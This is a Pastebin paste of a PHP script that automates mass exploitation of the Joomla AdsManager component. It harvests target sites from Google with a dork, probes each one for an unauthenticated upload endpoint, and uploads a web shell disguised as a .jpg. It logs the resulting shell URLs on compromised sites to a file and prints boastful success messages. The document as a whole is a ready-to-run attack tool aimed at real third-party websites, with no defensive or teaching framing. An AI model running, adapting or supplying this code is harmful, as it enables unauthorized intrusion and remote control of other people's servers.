Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- function letItBy() {
- ob_flush();
- flush();
- }
- function google_that($query, $page=1){
- $resultPerPage=8;
- $start = $page*$resultPerPage;
- $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw[&key=API_KEY_GOOGLE]&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); // you can delete this "[&key=API_KEY_GOOGLE]" if you haven't google API Key
- $resultFromGoogle = json_decode( http_get($url, true) ,true);
- if(isset($resultFromGoogle['responseStatus'])) {
- if($resultFromGoogle['responseStatus'] != '200') return false;
- if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
- else return $resultFromGoogle['responseData']['results'];
- } else
- die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
- }
- function http_get($url, $safemode = false){
- if($safemode === true) sleep(1);
- $im = curl_init($url);
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($im, CURLOPT_HEADER, 0);
- return curl_exec($im);
- curl_close();
- }
- function check_injection($url){
- $data = http_get( str_replace("=com_adsmanager", "=com_adsmanager&task=upload&tmpl=component", $url) );
- return preg_match('/"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile"/', $data);
- }
- ?>
- <!DOCTYPE html>
- <style type="text/css">
- a {
- text-decoration: none;
- color: green;
- }
- </style>
- <form method="post">
- Dork:
- <input style="border: 1px dashed #000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/index.php?option=com_adsmanager" />
- <input style="border: 1px dashed #000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
- </form>
- <?php
- if(isset($_POST['dork']{0})){
- echo "<hr width='50%' color='#008000'>";
- letItBy();
- for($googlePage = 1; $googlePage <= 10; $googlePage++){
- $googleResult = google_that($_POST['dork'], $googlePage);
- if(!$googleResult){
- echo 'google dont have more result, so I done..(?)';
- break;
- }
- for($victim = 0; $victim < sizeof($googleResult); $victim++) {
- if(check_injection($googleResult[$victim]['unescapedUrl'])){
- echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- $site = "http://".$googleResult[$victim]['visibleUrl']."/index.php?option=com_adsmanager&task=upload&tmpl=component";
- echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
- echo "[+] Ada Cuk!! => <a href='$site' target='_blank'> $site </a><br>";
- echo "[?] Bntr ya , mau di anu dulu :p<br>";
- $file = "name_of_ur_shell.php"; // this is renamed file of @urshell.jpg
- $postdata = array(
- "file"=>"@yourshell.jpg",
- "name"=>"$file"); // example "@c99.jpg" - ur shell extension must shell.jpg not .php
- $x = curl_init("{$site}");
- curl_setopt($x, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($x, CURLOPT_POST, 1);
- curl_setopt($x, CURLOPT_POSTFIELDS, $postdata);
- $res = curl_exec($x);
- if(preg_match("/error_log/", $res)) {
- $fh = fopen("sh3.txt","a"); // log result xploited victim
- fwrite($fh, "http://".$googleResult[$victim]['visibleUrl']."/tmp/plupload/$file"."\n");
- fclose($fh);
- echo "[+] <font color=green>Wih Hoki bener lu cok !! Sukses di anu => <a href='http://".$googleResult[$victim]['visibleUrl']."/tmp/plupload/$file' target='_blank'> http://".$googleResult[$victim]['visibleUrl']."/tmp/plupload/$file </a> <==</font>","<br>";
- } else {
- echo "[-] <font color=red>Yah Gagal Di Anu cok xixixi :p</font><br>";
- }
- echo "</div>";
- curl_close($x);
- }
- else echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
- echo "[-] <font color=red>Ga nemu cuk! </font><br>";
- echo "</div>";
- letItBy();
- }
- }
- }
- ?>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement